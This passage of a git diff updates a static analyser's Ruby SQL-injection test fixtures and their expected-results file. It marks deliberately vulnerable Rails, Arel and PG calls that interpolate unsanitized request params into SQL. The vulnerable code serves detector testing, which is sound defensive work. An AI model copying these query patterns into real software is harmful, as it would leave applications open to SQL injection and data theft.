destroy_by(condition) # $ Alert end end @@ -39,64 +39,64 @@ class FooController < ActionController::Base def some_request_handler # BAD: executes `SELECT AVG(#{params[:column]}) FROM "users"` # where `params[:column]` is unsanitized - User.calculate(:average, params[:column]) + User.calculate(:average, params[:column]) # $ Alert # BAD: executes `SELECT MAX(#{params[:column]}) FROM "users"` # where `params[:column]` is unsanitized - User.maximum(params[:column]) + User.maximum(params[:column]) # $ Alert # BAD: executes `DELETE FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized - User.delete_by("id = '#{params[:id]}'") + User.delete_by("id = '#{params[:id]}'") # $ Alert # BAD: executes `DELETE FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized # (in Rails < 4.0) - User.delete_all("id = '#{params[:id]}'") + User.delete_all("id = '#{params[:id]}'") # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized - User.destroy_by(["id = '#{params[:id]}'"]) + User.destroy_by(["id = '#{params[:id]}'"]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` # where `params[:id]` is unsanitized # (in Rails < 4.0) - User.destroy_all(["id = '#{params[:id]}'"]) + User.destroy_all(["id = '#{params[:id]}'"]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE id BETWEEN '#{params[:min_id]}' AND 100000` # where `params[:min_id]` is unsanitized - User.where(<<-SQL, MAX_USER_ID) - id BETWEEN '#{params[:min_id]}' AND ? + User.where(<<-SQL, MAX_USER_ID) # $ Alert + id BETWEEN '#{params[:min_id]}' AND ? # $ Source SQL # BAD: chained method case # executes `SELECT "users".* FROM "users" WHERE (NOT (user_id = 'params[:id]'))` # where `params[:id]` is unsanitized - User.where.not("user.id = '#{params[:id]}'") + User.where.not("user.id = '#{params[:id]}'") # $ Alert - User.authenticate(params[:name], params[:pass]) + User.authenticate(params[:name], params[:pass]) # $ Source # BAD: executes `SELECT "users".* FROM "users" WHERE (id = '#{params[:id]}')` LIMIT 1 # where `params[:id]` is unsanitized - User.find_or_initialize_by("id = '#{params[:id]}'") + User.find_or_initialize_by("id = '#{params[:id]}'") # $ Alert user = User.first # BAD: executes `SELECT "users".* FROM "users" WHERE id = 1 LIMIT 1 #{params[:lock]}` # where `params[:lock]` is unsanitized - user.reload(lock: params[:lock]) + user.reload(lock: params[:lock]) # $ Alert # BAD: executes `SELECT #{params[:column]} FROM "users"` # where `params[:column]` is unsanitized - User.select(params[:column]) - User.reselect(params[:column]) + User.select(params[:column]) # $ Alert + User.reselect(params[:column]) # $ Alert # BAD: executes `SELECT "users".* FROM "users" WHERE (#{params[:condition]})` # where `params[:condition]` is unsanitized - User.rewhere(params[:condition]) + User.rewhere(params[:condition]) # $ Alert # BAD: executes `UPDATE "users" SET #{params[:fields]}` # where `params[:fields]` is unsanitized - User.update_all(params[:fields]) + User.update_all(params[:fields]) # $ Alert # GOOD -- `update_all` sanitizes its bind variable arguments User.find_by(name: params[:user_name]) @@ -104,41 +104,41 @@ def some_request_handler # BAD -- `update_all` does not sanitize its query (array arg) User.find_by(name: params[:user_name]) - .update_all(["name = '#{params[:new_user_name]}'"]) + .update_all(["name = '#{params[:new_user_name]}'"]) # $ Alert # BAD -- `update_all` does not sanitize its query (string arg) User.find_by(name: params[:user_name]) - .update_all("name = '#{params[:new_user_name]}'") + .update_all("name = '#{params[:new_user_name]}'") # $ Alert - User.reorder(params[:direction]) + User.reorder(params[:direction]) # $ Alert - User.select('a','b', params[:column]) - User.reselect('a','b', params[:column]) - User.order('a ASC', "b #{params[:direction]}") - User.reorder('a ASC', "b #{params[:direction]}") - User.group('a', params[:column]) - User.pluck('a', params[:column]) - User.joins(:a, params[:column]) + User.select('a','b', params[:column]) # $ Alert + User.reselect('a','b', params[:column]) # $ Alert + User.order('a ASC', "b #{params[:direction]}") # $ Alert + User.reorder('a ASC', "b #{params[:direction]}") # $ Alert + User.group('a', params[:column]) # $ Alert + User.pluck('a', params[:column]) # $ Alert + User.joins(:a, params[:column]) # $ Alert - User.count_by_sql(params[:custom_sql_query]) + User.count_by_sql(params[:custom_sql_query]) # $ Alert # BAD: executes `SELECT users.* FROM #{params[:tab]}` # where `params[:tab]` is unsanitized - User.all.from(params[:tab]) + User.all.from(params[:tab]) # $ Alert # BAD: executes `SELECT "users".* FROM (SELECT "users".* FROM "users") #{params[:sq]} - User.all.from(User.all, params[:sq]) + User.all.from(User.all, params[:sq]) # $ Alert end end class BarController < ApplicationController def some_other_request_handler - ps = params + ps = params # $ Source uid = ps[:id] uidEq = "= '#{uid}'" # BAD: executes `DELETE FROM "users" WHERE (id = #{uid})` # where `uid` is unsantized - User.delete_by("id " + uidEq) + User.delete_by("id " + uidEq) # $ Alert end def safe_paths @@ -171,7 +171,7 @@ def safe_paths class BazController < BarController def yet_another_handler - Admin.delete_by(params[:admin_condition]) + Admin.delete_by(params[:admin_condition]) # $ Alert Source end end @@ -185,7 +185,7 @@ def index def unsafe_action name = params[:user_name] # BAD: user input passed into annotations are vulnerable to SQLi - users = User.annotate("this is an unsafe annotation:#{params[:comment]}").find_by(user_name: name) + users = User.annotate("this is an unsafe annotation:#{params[:comment]}").find_by(user_name: name) # $ Alert end end @@ -198,27 +198,27 @@ class RegressionController < ActionController::Base def index my_params = permitted_params query = "SELECT * FROM users WHERE id = #{my_params[:user_id]}" - result = Regression.find_by_sql(query) + result = Regression.find_by_sql(query) # $ Alert end def permitted_params - params.require(:my_key).permit(:id, :user_id, :my_type) + params.require(:my_key).permit(:id, :user_id, :my_type) # $ Source end def show - ActiveRecord::Base.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") - Regression.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") + ActiveRecord::Base.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") # $ Alert + Regression.connection.execute("SELECT * FROM users WHERE id = #{permitted_params[:user_id]}") # $ Alert end end class User - scope :with_role, ->(role) { where("role = #{role}") } + scope :with_role, ->(role) { where("role = #{role}") } # $ Alert end class UsersController < ActionController::Base def index # BAD: user input passed to scope which uses it without sanitization. - @users = User.with_role(params[:role]) + @users = User.with_role(params[:role]) # $ Source end end diff --git a/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb index 1cd6782b2416..707ab181e45e 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/ArelInjection.rb @@ -1,9 +1,9 @@ class PotatoController < ActionController::Base def unsafe_action - name = params[:user_name] + name = params[:user_name] # $ Source # BAD: SQL statement constructed from user input - sql = Arel.sql("SELECT * FROM users WHERE name = #{name}") - sql = Arel::Nodes::SqlLiteral.new("SELECT * FROM users WHERE name = #{name}") + sql = Arel.sql("SELECT * FROM users WHERE name = #{name}") # $ Alert + sql = Arel::Nodes::SqlLiteral.new("SELECT * FROM users WHERE name = #{name}") # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb index 549be4898582..c44e078ee843 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/PgInjection.rb @@ -3,7 +3,7 @@ class FooController < ActionController::Base def some_request_handler # A string tainted by user input is inserted into a query # (i.e a remote flow source) - name = params[:name] + name = params[:name] # $ Source # Establish a connection to a PostgreSQL database conn = PG::Connection.open(:dbname => 'postgresql', :user => 'user', :password => 'pass', :host => 'localhost', :port => '5432') @@ -11,14 +11,14 @@ def some_request_handler # .exec() and .async_exec() # BAD: SQL statement constructed from user input qry1 = "SELECT * FROM users WHERE username = '#{name}';" - conn.exec(qry1) - conn.async_exec(qry1) + conn.exec(qry1) # $ Alert + conn.async_exec(qry1) # $ Alert # .exec_params() and .async_exec_params() # BAD: SQL statement constructed from user input qry2 = "SELECT * FROM users WHERE username = '#{name}';" - conn.exec_params(qry2) - conn.async_exec_params(qry2) + conn.exec_params(qry2) # $ Alert + conn.async_exec_params(qry2) # $ Alert # .exec_params() and .async_exec_params() # GOOD: SQL statement constructed from sanitized user input @@ -29,7 +29,7 @@ def some_request_handler # .prepare() and .exec_prepared() # BAD: SQL statement constructed from user input qry3 = "SELECT * FROM users WHERE username = '#{name}';" - conn.prepare("query_1", qry3) + conn.prepare("query_1", qry3) # $ Alert conn.exec_prepared('query_1') # .prepare() and .exec_prepared() @@ -41,7 +41,7 @@ def some_request_handler # .prepare() and .exec_prepared() # NOT EXECUTED: SQL statement constructed from user input but not executed qry3 = "SELECT * FROM users WHERE username = '#{name}';" - conn.prepare("query_3", qry3) + conn.prepare("query_3", qry3) # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected index 069cb34810fc..f1c2646afce8 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected @@ -1,3 +1,52 @@ +#select +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | +| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. | ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | +| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | +| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | +| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | +| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | +| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | +| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | +| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | +| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | +| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:121:20:121:25 | call to params | user-provided value | +| ActiveRecordInjection.rb:123:23:123:47 | ...[...] | ActiveRecordInjection.rb:123:23:123:28 | call to params | ActiveRecordInjection.rb:123:23:123:47 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:123:23:123:28 | call to params | user-provided value | +| ActiveRecordInjection.rb:127:19:127:30 | ...[...] | ActiveRecordInjection.rb:127:19:127:24 | call to params | ActiveRecordInjection.rb:127:19:127:30 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:127:19:127:24 | call to params | user-provided value | +| ActiveRecordInjection.rb:129:29:129:39 | ...[...] | ActiveRecordInjection.rb:129:29:129:34 | call to params | ActiveRecordInjection.rb:129:29:129:39 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:129:29:129:34 | call to params | user-provided value | +| ActiveRecordInjection.rb:141:20:141:32 | ... + ... | ActiveRecordInjection.rb:135:10:135:15 | call to params | ActiveRecordInjection.rb:141:20:141:32 | ... + ... | This SQL query depends on a $@. | ActiveRecordInjection.rb:135:10:135:15 | call to params | user-provided value | +| ActiveRecordInjection.rb:174:21:174:44 | ...[...] | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:174:21:174:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | +| ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | ActiveRecordInjection.rb:188:59:188:64 | call to params | ActiveRecordInjection.rb:188:27:188:76 | "this is an unsafe annotation:..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:188:59:188:64 | call to params | user-provided value | +| ActiveRecordInjection.rb:201:37:201:41 | query | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:201:37:201:41 | query | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:210:43:210:104 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | ActiveRecordInjection.rb:206:5:206:10 | call to params | ActiveRecordInjection.rb:211:35:211:96 | "SELECT * FROM users WHERE id ..." | This SQL query depends on a $@. | ActiveRecordInjection.rb:206:5:206:10 | call to params | user-provided value | +| ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | ActiveRecordInjection.rb:222:29:222:34 | call to params | ActiveRecordInjection.rb:216:38:216:53 | "role = #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:222:29:222:34 | call to params | user-provided value | +| ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:6:20:6:61 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | ArelInjection.rb:4:12:4:17 | call to params | ArelInjection.rb:7:39:7:80 | "SELECT * FROM users WHERE nam..." | This SQL query depends on a $@. | ArelInjection.rb:4:12:4:17 | call to params | user-provided value | +| PgInjection.rb:14:15:14:18 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:14:15:14:18 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:15:21:15:24 | qry1 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:15:21:15:24 | qry1 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:20:22:20:25 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:20:22:20:25 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:21:28:21:31 | qry2 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:21:28:21:31 | qry2 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:32:29:32:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:32:29:32:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | +| PgInjection.rb:44:29:44:32 | qry3 | PgInjection.rb:6:12:6:17 | call to params | PgInjection.rb:44:29:44:32 | qry3 | This SQL query depends on a $@. | PgInjection.rb:6:12:6:17 | call to params | user-provided value | edges | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | | ActiveRecordInjection.rb:8:25:8:28 | name | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | provenance | AdditionalTaintStep | @@ -223,52 +272,3 @@ nodes | PgInjection.rb:43:5:43:8 | qry3 : String | semmle.label | qry3 : String | | PgInjection.rb:44:29:44:32 | qry3 | semmle.label | qry3 | subpaths -#select -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. | ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | -| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | -| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | -| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | -| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | -| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | 